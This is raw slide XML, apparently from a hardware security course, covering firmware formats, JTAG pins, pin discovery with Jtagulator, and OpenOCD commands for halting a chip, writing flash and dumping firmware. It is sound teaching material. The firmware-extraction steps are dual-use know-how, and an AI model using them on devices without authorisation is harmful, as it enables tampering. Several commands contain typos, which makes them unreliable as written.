          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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14" y="113983"/>
            <a:ext cx="10955008" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software processes and formats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483747" y="1556819"/>
            <a:ext cx="11224506" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Firmware Packing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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pt-BR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pure archives (CPIO/Ar/Tar/GZip/BZip/LZxxx/RPM) </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Pure filesystems (YAFFS, JFFS2, extNfs)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Pure binary formats (SREC, iHEX, ELF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Formats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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Ext4/Ext3/Ext2</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YAFFS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JFFS2</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SquashFS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CPIO/Ar/Tar/GZip/BZip/LZxxx/RPM</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Note: many Linux based devices have full filesystem images (a raw image/DD), sometimes they have differencial images (as tar archives). </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EE286DE-9478-5A47-9AC0-A834BFC399E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="839096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07156"/>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JTAG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1779931"/>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Joint Test Action Group described,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Dedicated debug port (Test Access Port) implementing stateful serial communication protocol allowing access to on-chip debug registers.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Allows reading and setting non-volatile memory.</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Ports can be daisy chained (boundary scan).</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2, 4 or 5 pin interface:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (Test Data In)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TDO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (Test Data Out)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TCK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (Test Clock)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (Test Mode Select)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TRST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (Test Reset) optional.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Boundary scan instructions include bypass and extest.</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Manufacturer provides Boundary scan description file in BSDL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EB29D84-EFBD-794B-A7BC-F44AEB0D9C62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDD54A8D-745D-0F45-B1BF-E4E2CCFA35B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83326" y="3027026"/>
            <a:ext cx="5276116" cy="2006023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD2AB67C-4E10-5E41-88C1-5413FEF87DF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9531927" y="5386143"/>
            <a:ext cx="1284326"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1108811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36525"/>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JTAG example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276124" y="1692910"/>
            <a:ext cx="11582400" cy="466344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TAP controller puts test data on TDI.  BSR monitors TDI.</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Data sent to device via TDI.</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Data exported by device through TDO.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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JTAG pins or pads.  Example: Raspberry Pi.</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Jtagulator identifies pins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Screen /dev/ttyUSB0 115200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Can also use Arduino with JTAGenum to identify pins.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OpenOCD is utility that interfaces with JTAG.  See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ARM has a two signal wire JTAG like debug port called SWD.  See the cortex M1 documentation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>at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http://infocenter.arm.com</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7EB29D84-EFBD-794B-A7BC-F44AEB0D9C62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92F3F27B-D12E-4947-9C93-02EEBA6F71AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8200135" y="3092450"/>
            <a:ext cx="3501809" cy="1644142"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5A0224F-165E-454D-B138-DBD99E809A6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9795163" y="4836940"/>
            <a:ext cx="1375698" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Optiv.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30208991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2264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OpenOCD with badge</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624502" y="1500486"/>
            <a:ext cx="5471498"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Allows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Chip debug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Setting breakpoints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Analyzing flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Dumping firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Get OpenOCD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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Download zip file and manual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Attify connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>TCK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>D0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>TDID1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>TDO  D2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>TMSD3</a:t>
            </a:r>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7EB29D84-EFBD-794B-A7BC-F44AEB0D9C62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F144D56F-8847-E34A-989E-7D2C92BC3E1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5163889" y="1500486"/>
            <a:ext cx="7165298"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rial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Badge config (badge.cfg)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>interface ftdi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fdti_vid_pid 0x0403 0x6014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fdti_layout_init 0x0c08 0x0f1b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adapter_khz 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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Example for stm32 microcontroller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo openocd “telenet_port 4444” –f badge.cfg –f stm32x.cfg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sudo telnet localhost 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reset inti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Halt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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Writing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>flash write_image  erase firmware.fin 0x08000000</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Reading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dump image dump.bin 0x08000000 0x01000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49"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a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4103083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02312"/>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5,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simple software attacks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5479E64-B8F6-D64D-A58C-EA034BF4D76B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283707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Software Reverse Engineering with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ghidra</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There is a separate section on reverse engineering with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ghidra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
